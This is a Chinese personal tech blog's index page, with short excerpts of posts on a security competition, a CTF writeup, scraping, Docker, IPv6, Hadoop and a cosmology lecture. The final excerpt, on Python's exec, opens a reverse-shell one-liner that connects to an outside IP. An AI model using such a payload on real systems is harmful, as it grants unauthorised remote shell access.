Les1ie

锲而不舍,金石可镂。

铁人三项赛11赛区企业赛总结

没做出来两道题,根本不敢自称wp

序 2018年5月26日 重庆邮电大学 Grootsec 比赛之前一周才接到通知,准备好了一堆ew shell, 字典 代理工具扫描器,还带上了awvs.. 本来还准备上巡风的.. 但是看了下kali装docker还是放弃了 企业赛 两套系统,ip分别是202.1.16.112, 202.1.16.122,先扫一圈, 112的80是wordpress 4.9.1, 8080端口开了j...

宇宙学、超新星和引力波

讲座语录

序 看到围合贴的活动通知,慕名而来 讲座随笔 注:随笔记录,可能存在笔误 2018年6月4日19:25:12 王力帆 紫金山天文台 最重要的分支: 宇宙学 宇宙学 光速有限,因此可以观测遥远的星系,并研究宇宙数十亿年前的性质 根据亮度变化周期来判定他的距离 超新星判定距离 白矮星的亮度恒定,越暗则越远 超新星非常亮,几十亿光年都能测到 某一个星系旁边突然出现...

安装ubuntu操作系统

新手第1w次安装ubuntu

序 因为某些原因需要给一个i7-8550u的cpu, nvme 128g ssd的mini pc 安装ubuntu 大概长这个样子 出厂的时候是装好了win10的,但是我们的程序需要运行在ubuntu上 以前是直接就装好了ubuntu 16.04.3,用了很长一段时间,但是最近发现120G 的硬盘被撑满了, 看了下发现是 /var/log/kern.log, /var/log/sys...

和教务处反爬虫之间的游戏

感谢教务处为我们技术进步做出的不懈努力

序 之前写了个爬学校各大网站新闻然后推送到邮箱的程序,上线了几个月,一直正常运行,还收获了一些用户 直到前几天突然发现.. 似乎很久没收到过邮件推送的教务处的更新了,莫非教务处改了网页,爬虫拿不到数据了? 手抖删库 ssh连到服务器里面,检查了下负责教务处的jwc.py, 发现运行返回值是None, 正常情况下是返回当前页面所有的新闻的标题和url, 每个新闻的具体内容,确认就是这里出...

2017 美亚柏科邀请赛 writeup

一个辣鸡随手写的writeup

序 拿flag是不可能的了,这辈子都不可能拿flag的。 题目又不会,只能看看各位神仙师傅的wp才能勉强说是我是搞安全的。 逛大佬的博客就像是回了家一样,这里的师傅都好有才,说话又好听,我超喜欢这里的。 web2 题目 login as webmaster 打开是一个登录框 看起来像是一个爆破或者登录绕过。 拿出了1w的字典,php万能密码爆破许久,试过了root, admin,ad...

SCURSS 开发小记

一个好玩的网站消息推送系统

序 2017年暑假的时候经常逛freebuf,每天都会刷好几次 因为懒得打开,于是用了ifttt, 连接了pocket, 手机上有pocket的客户端,设定规则是 if freebuf更新文章了,then 添加到我的pocket阅读列表里面。 最初还有点用,但是后来渐渐发现这样用有点问题,不是随时有时间看,但是他的更新会一直加,加上当时订阅了好几个网站的更新,所以很快pocket列表也...

Docker Compose容器编排

序 因为某些原因,写了个新闻聚合的应用,取名SCURSS ,这里想分享的是用容器进行虚拟化的思路 容器 具体内容就是一个爬虫定期爬取教务处,计算机学院官网,学工部,然后检查新闻内容是否发生了变化,如果发生了变化,那么更新数据库,然后邮件推送给订阅的用户发生更新了的消息 这里想说的是用的docker来部署的服务, 虽然这不是什么新鲜的东西,但是我还没处理过这么多的容器之间的依赖关系,所以简...

Ipv6随笔

一直没有仔细地研究过的ipv6

0x00 序 总是有人问川大的Ipv6是多少,看着这个问题怪别扭,就像问川大的教室是哪个一样,这种问题怎么回答? 不过或许可以直接回答是哪一个CIDR段(数据来源于 这里 ) 2001:250:2003::/48 也就是 2001:250:2003:0000:0000:0000:0000 到 2001:250:200:ffff:ffff:ffff:ffff 分配给四川大学的一共...

配置hadoop环境

生命在于折腾

0x00 序 前两天一同学来找我问爬虫,知道周五上午有个课程要说爬虫,瞬间兴趣来了,于是今天去上了课,发现挺有趣,现在让我们配置Hadoop,简要记录下过程 0x01 docker 国际惯例,找别人的docker镜像 $ docker search hadoop NAME DESCRIPTION ...

python built-in function

python 的內建函数

0x00 2017-8-8 14:17:43 一直没有怎么用过python的几个内建函数,这里学习一下 0x01 exec 这个嘛..执行代码片段,反弹shell不解释 In [1]: s = 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("111.23...